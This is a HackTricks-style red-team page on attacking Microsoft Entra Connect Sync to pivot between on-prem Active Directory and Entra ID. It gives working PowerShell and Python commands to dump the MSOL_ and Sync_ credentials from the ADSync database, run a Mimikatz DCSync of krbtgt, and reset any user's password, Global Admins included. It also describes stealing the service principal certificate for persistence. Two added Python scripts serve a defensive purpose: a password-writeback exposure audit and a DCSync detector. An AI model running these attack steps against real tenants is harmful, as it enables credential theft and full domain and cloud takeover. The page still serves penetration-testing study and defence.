Az - Connect Sync

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

From the docs: Microsoft Entra Connect synchronization services (Microsoft Entra Connect Sync) is a main component of Microsoft Entra Connect. It takes care of all the operations related to synchronizing identity data between your on-premises environment and Microsoft Entra ID.

The sync service consists of two components: the on-premises component, Microsoft Entra Connect Sync, and the service side in Microsoft Entra ID, called the Microsoft Entra Connect Sync service.

To use it, the Microsoft Entra Connect Sync agent must be installed on a server inside your AD environment. This agent is what performs the synchronization from the AD side.

Connect Sync is basically the "old" Azure way of synchronizing users from AD to Entra ID. The new recommended way is to use Entra Cloud Sync:

Az - Cloud Sync

Principals Created

  • The account MSOL_<installationID> is automatically created in the on-prem AD. This account is given the Directory Synchronization Accounts role (see the documentation), which means it has replication permissions (DCSync) in the on-prem AD.
  • This means that anyone who manages to take control of this account will be able to compromise the on-premises domain.
  • The managed service account ADSyncMSA<id> is created in the on-prem AD with no special permissions by default.
  • In Entra ID the Service Principal ConnectSyncProvisioning_ConnectSync_<id> is created with a certificate.

Password Synchronization

Password Hash Synchronization

This component can also be used to synchronize passwords from AD to Entra ID so that users can use their AD passwords to authenticate to Entra ID. For this, password hash synchronization must be enabled in the Microsoft Entra Connect Sync agent installed on the AD server.

From the docs: Password hash synchronization is one of the sign-in methods used to accomplish hybrid identity. Azure AD Connect synchronizes a hash, of the hash, of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance.

By default, all users and the hashes of the password hashes are synchronized from on-prem to Azure AD. However, neither cleartext passwords nor the original hashes are sent to Azure AD.

Hash synchronization happens every 2 minutes. However, by default, password expiry and account expiry are not synchronized to Azure AD. So a user whose on-prem password has expired (but was not changed) can continue to access Azure resources with the old password.

When an on-prem user wants to access Azure resources, authentication happens in Azure AD.

note

By default, members of well-known privileged groups such as Domain Admins that have the adminCount attribute set to 1 are not synchronized to Entra ID for security reasons. However, other users that are part of privileged groups without this attribute, or that were granted elevated permissions directly, may be synchronized.

Password Writeback

This setting allows synchronizing passwords from Entra ID to AD when a user changes their password in Entra ID. Note that for password writeback to work, the MSOL_<id> user automatically created in AD must be granted extra permissions, as explained in the docs, so that it can change the password of any user in AD.

This is especially interesting for compromising AD from a compromised Entra ID, since you will be able to change the password of "almost" any user.

Domain admins and other users in some powerful groups are not written back if the group has the adminCount attribute set to 1. But other users that were granted elevated privileges inside AD without being members of those groups can have their passwords changed. For example:

  • Users directly granted elevated permissions.
  • Members of the DNSAdmins group.
  • Members of the Group Policy Creator Owners group who created GPOs and linked them to OUs, since they can edit the GPOs they created.
  • Members of the Cert Publishers group, who can publish certificates inside Active Directory.
  • Members of any other group with elevated privileges that does not have the adminCount attribute set to 1.
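To see which synced accounts a tenant-side password reset could reach, here is an added Python audit (example code written for this page, not HackTricks' or Microsoft's) that applies the rule above to a constructed directory snapshot: it resolves nested group membership, treats adminCount=1 as the point where writeback stops, and flags synced users that hold privileges only through groups AdminSDHolder does not protect (DNSAdmins, Group Policy Creator Owners, Cert Publishers), through direct rights, or through a protected group whose adminCount stamp has not landed yet. The group list, the user names and the `synced`/`direct_rights` fields are assumptions standing in for an LDAP export.

```python
from collections import deque

# Groups protected by AdminSDHolder (assumption: the default set). Their members get
# adminCount=1 once SDProp runs and, per the page's rule, are then not written back.
PROTECTED_GROUPS = {
    "Administrators", "Domain Admins", "Enterprise Admins", "Schema Admins",
    "Account Operators", "Server Operators", "Backup Operators", "Print Operators",
}
# Privileged groups listed on the page that AdminSDHolder does not protect.
UNPROTECTED_PRIVILEGED_GROUPS = {"DNSAdmins", "Group Policy Creator Owners", "Cert Publishers"}

# Constructed snapshot: group -> direct members (users or nested groups).
GROUPS = {
    "Domain Admins": ["da.alice", "new.da"],
    "DNSAdmins": ["dns.bob", "Helpdesk Tier2"],
    "Helpdesk Tier2": ["hd.carol"],
    "Cert Publishers": ["pki.dave"],
    "Group Policy Creator Owners": [],
}
# Constructed users: adminCount, whether the object is synced to Entra ID (writeback
# only reaches synced users) and any rights granted directly on the domain head.
USERS = {
    "da.alice":    {"adminCount": 1, "synced": True,  "direct_rights": []},
    "new.da":      {"adminCount": 0, "synced": True,  "direct_rights": []},
    "dns.bob":     {"adminCount": 0, "synced": True,  "direct_rights": []},
    "hd.carol":    {"adminCount": 0, "synced": True,  "direct_rights": []},
    "pki.dave":    {"adminCount": 0, "synced": False, "direct_rights": []},
    "svc.eve":     {"adminCount": 0, "synced": True,  "direct_rights": ["WriteDacl"]},
    "plain.frank": {"adminCount": 0, "synced": True,  "direct_rights": []},
}


def transitive_groups(member, groups):
    """All groups `member` belongs to, directly or through nesting (breadth-first)."""
    parents = {}
    for group, members in groups.items():
        for m in members:
            parents.setdefault(m, set()).add(group)
    seen, queue = set(), deque([member])
    while queue:
        current = queue.popleft()
        for group in parents.get(current, ()):
            if group not in seen:
                seen.add(group)
                queue.append(group)
    return seen


def writeback_exposed(users, groups):
    """Synced users that writeback can reset even though they hold privileges.

    Returns {user: [reasons]}. Users with adminCount=1 are skipped because the page's
    rule is that those are not written back; unsynced users are out of reach anyway.
    """
    exposed = {}
    for name, attrs in users.items():
        if not attrs["synced"] or attrs["adminCount"] == 1:
            continue
        memberships = transitive_groups(name, groups)
        reasons = [f"member of {g}" for g in sorted(memberships & UNPROTECTED_PRIVILEGED_GROUPS)]
        reasons += [f"member of protected group {g} but adminCount is not 1"
                    for g in sorted(memberships & PROTECTED_GROUPS)]
        reasons += [f"direct right {r}" for r in attrs["direct_rights"]]
        if reasons:
            exposed[name] = reasons
    return exposed


if __name__ == "__main__":
    for user, reasons in writeback_exposed(USERS, GROUPS).items():
        print(f"{user}: {'; '.join(reasons)}")
```

Run against a real export, the output is the list of accounts to either remove from the unprotected groups, exclude from the sync scope, or at least watch for password resets originating from the cloud side. Note that `hd.carol` is reported even though she is only in DNSAdmins through a nested helpdesk group, which is exactly the case a flat membership check misses.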

Pivoting AD --> Entra ID

Enumerating Connect Sync

Check for users:

```powershell
# Check for the users created by the Connect Sync
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties Description | Select-Object SamAccountName,Description | fl
Get-ADServiceAccount -Filter "SamAccountName -like 'ADSyncMSA*'" -Properties SamAccountName,Description | Select-Object SamAccountName,Description | fl
Get-ADUser -Filter "samAccountName -like 'Sync_*'" -Properties Description | Select-Object SamAccountName,Description | fl

# Check it using raw LDAP queries without needing an external module
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(samAccountName=MSOL_*)"
$searcher.FindAll()
$searcher.Filter = "(samAccountName=ADSyncMSA*)"
$searcher.FindAll()
$searcher.Filter = "(samAccountName=Sync_*)"
$searcher.FindAll()
```

Check the Connect Sync configuration (if any):

```powershell
az rest --url "https://graph.microsoft.com/v1.0/directory/onPremisesSynchronization"
# Check if password synchronization is enabled, if password and group writeback are enabled...
```

Getting the passwords

The passwords of the MSOL_* user (and of the Sync_* user, if it was created) are stored in an SQL server on the server where Entra ID Connect is installed. Administrators can extract the passwords of those privileged users in cleartext.
The database is located in C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

It's possible to extract the configuration from one of the tables; one of the columns is encrypted:

```sql
SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;
```

The encrypted configuration is encrypted with DPAPI and contains the password of the MSOL_* user in the on-prem AD and the password of Sync_* in AzureAD. Therefore, compromising these makes it possible to escalate privileges in both AD and AzureAD.

You can find a full overview of how these credentials are stored and decrypted in this talk.

Abusing MSOL_*

```powershell
# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Install-Module -Name AADInternals -RequiredVersion 0.9.0 # Uninstall-Module AADInternals if you have a later version
Import-Module AADInternals
Get-AADIntSyncCredentials
# Or check DumpAADSyncCreds.exe from https://github.com/Hagrid29/DumpAADSyncCreds/tree/main

# Using https://github.com/dirkjanm/adconnectdump
python .\adconnectdump.py [domain.local]/administrator:<password>@192.168.10.80
.\ADSyncQuery.exe C:\Users\eitot\Tools\adconnectdump\ADSync.mdf > out.txt
python .\adconnectdump.py [domain.local]/administrator:<password>@192.168.10.80 --existing-db --from-file out.txt

# Using the creds of the MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'
```

warning

The previous attacks used to obtain another password, then log in as an Entra ID user called Sync_* and compromise Entra ID from there. However, this user no longer exists.
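Because the MSOL_* account legitimately holds replication rights, a DCSync detection cannot key on the right alone; the signal is the context: the sync account replicating from a session that did not originate on the Connect Sync server, or any principal that is not a domain controller requesting replication at all. The following Python is an added example (not from HackTricks or from any tool named on this page) that correlates DC Security-log events 4662 (directory object access, which needs "Audit Directory Service Access" enabled on the DCs) with 4624 (logon) by logon ID to attribute each replication request to a source host. The event records, the DC names, the MSOL_ account name, the IP addresses and the placeholder GUID `aaaaaaaa-…` are all constructed; the two replication control-access GUIDs and the domainDNS object-type GUID are the standard Active Directory values.

```python
import re

# Control-access rights whose presence in a 4662 Properties field marks a replication
# request (the rights DCSync needs). These are the standard AD GUIDs.
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"       # DS-Replication-Get-Changes
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"   # DS-Replication-Get-Changes-All
REPL_GUIDS = {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Assumed inventory (placeholders): DC computer accounts and the one host running Connect Sync.
DOMAIN_CONTROLLERS = {"DC01$", "DC02$"}
CONNECT_SYNC_HOST_IP = "10.0.0.50"
SYNC_ACCOUNT_PREFIX = "MSOL_"

# Constructed DC Security-log records, already parsed into fields as a SIEM would deliver them.
EVENTS = [
    {"EventID": 4624, "TargetUserName": "DC02$",         "TargetLogonId": "0x1a2b", "IpAddress": "10.0.0.11"},
    {"EventID": 4624, "TargetUserName": "MSOL_1234abcd", "TargetLogonId": "0x2c3d", "IpAddress": "10.0.0.50"},
    {"EventID": 4624, "TargetUserName": "MSOL_1234abcd", "TargetLogonId": "0x3e4f", "IpAddress": "10.0.0.77"},
    {"EventID": 4624, "TargetUserName": "jdoe",          "TargetLogonId": "0x5a6b", "IpAddress": "10.0.0.88"},
    # Routine DC-to-DC replication (domainDNS object type 19195a5b-...).
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x1a2b",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Connect Sync account replicating from its own server: expected.
    {"EventID": 4662, "SubjectUserName": "MSOL_1234abcd", "SubjectLogonId": "0x2c3d",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Same account, but the logon session came from a different host.
    {"EventID": 4662, "SubjectUserName": "MSOL_1234abcd", "SubjectLogonId": "0x3e4f",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Ordinary user touching a non-replication property (placeholder GUID): not a replication request.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectLogonId": "0x5a6b",
     "Properties": "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
    # Ordinary user requesting replication rights.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectLogonId": "0x5a6b",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def logon_sources(events):
    """LogonId -> source IP from 4624 records, so later 4662 records can be tied to a host."""
    return {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}


def is_replication_request(event):
    """True when a 4662 record carries one of the replication control-access rights."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return bool(guids & REPL_GUIDS)


def replication_alerts(events, dcs=DOMAIN_CONTROLLERS, sync_host_ip=CONNECT_SYNC_HOST_IP):
    """Replication requests from anything other than a DC or the sync account on its own host."""
    sources = logon_sources(events)
    alerts = []
    for e in events:
        if e["EventID"] != 4662 or not is_replication_request(e):
            continue
        subject = e["SubjectUserName"]
        src_ip = sources.get(e["SubjectLogonId"], "unknown")
        if subject in dcs:
            continue  # DC-to-DC replication is expected
        if subject.upper().startswith(SYNC_ACCOUNT_PREFIX):
            if src_ip == sync_host_ip:
                continue  # the agent doing its job from the Connect Sync server
            reason = "sync account replicating from unexpected host"
        else:
            reason = "replication request by non-DC principal"
        alerts.append({"subject": subject, "source_ip": src_ip, "reason": reason})
    return alerts


if __name__ == "__main__":
    for a in replication_alerts(EVENTS):
        print(f"ALERT {a['subject']} from {a['source_ip']}: {a['reason']}")
```

On the constructed input only two records alert: the MSOL_ session from 10.0.0.77 (the `runas /netonly` pattern above, where stolen sync credentials are used from a foreign host) and jdoe's replication request. Logon IDs are only unique per DC, so in a real pipeline the correlation key must include the reporting computer; the example keeps a single DC's log to stay short.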

Abusing ConnectSyncProvisioning_ConnectSync_

This application is created without any Entra ID or Azure administrative roles assigned. However, it has the following API permissions:

  • Microsoft Entra AD Synchronization Service
  • ADSynchronization.ReadWrite.All
  • Microsoft password reset service
  • PasswordWriteback.OffboardClient.All
  • PasswordWriteback.RefreshClient.All
  • PasswordWriteback.RegisterClientVersion.All

It's suspected that the SP of this application could still be used to perform some privileged actions through an undocumented API, but as far as I know no PoC has been found.
However, assuming it could be possible, it would be interesting to investigate further how to obtain the certificate to log in as this service principal and try to abuse it.

This blog post, released soon after the change from using the Sync_* user to this service principal, explained that the certificate was stored inside the server and it was possible to find it, generate a PoP (Proof of Possession) for it and a Graph token, and with that add a new certificate to the service principal (because a service principal can always assign itself new certificates) and then use it to maintain persistence as the SP.

To perform these actions, the following tool was released: SharpECUtils.

According to this issue, to obtain the certificate you must run the tool from a process that has stolen the token of the miiserver process.

Abusing Sync_* [DEPRECATED]

warning

Originally a user called Sync_* was created in Entra ID with very sensitive permissions assigned, which allowed privileged actions such as changing any user's password or adding a new certificate to a service principal. However, since Jan 2025 this user is no longer created by default, as the Application/SP ConnectSyncProvisioning_ConnectSync_<id> is now used instead. Nevertheless, it may still exist in some environments, so it's worth checking.

By compromising the Sync_* account it's possible to reset the password of any user (including Global Administrators):

```powershell
Install-Module -Name AADInternals -RequiredVersion 0.9.0 # Uninstall-Module AADInternals if you have a later version
Import-Module AADInternals

# This command, run previously, will also give us the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds -SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from the on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the user's password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and on-prem with the old one (password changes aren't synced back)
```

It's also possible to change the passwords of cloud-only users (even if that wasn't expected):

```powershell
# To reset the password of a cloud-only user, we need their CloudAnchor, which can be calculated from their cloud ObjectID
# The CloudAnchor is of the format User_ObjectID
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbose
```

It's also possible to dump this user's password.

caution

Another option would be to assign privileged permissions to a service principal, which the Sync user has permissions to do, and then access that service principal as a way to escalate privileges.

Seamless SSO

It's possible to use Seamless SSO together with PHS, which may be vulnerable to other abuses. Check it in:

Az - Seamless SSO

Pivoting Entra ID --> AD

  • If password writeback is enabled, you can modify the password of any user in AD that is synchronized with Entra ID.
  • If group writeback is enabled, you can add users to privileged groups in Entra ID that are synchronized with AD.
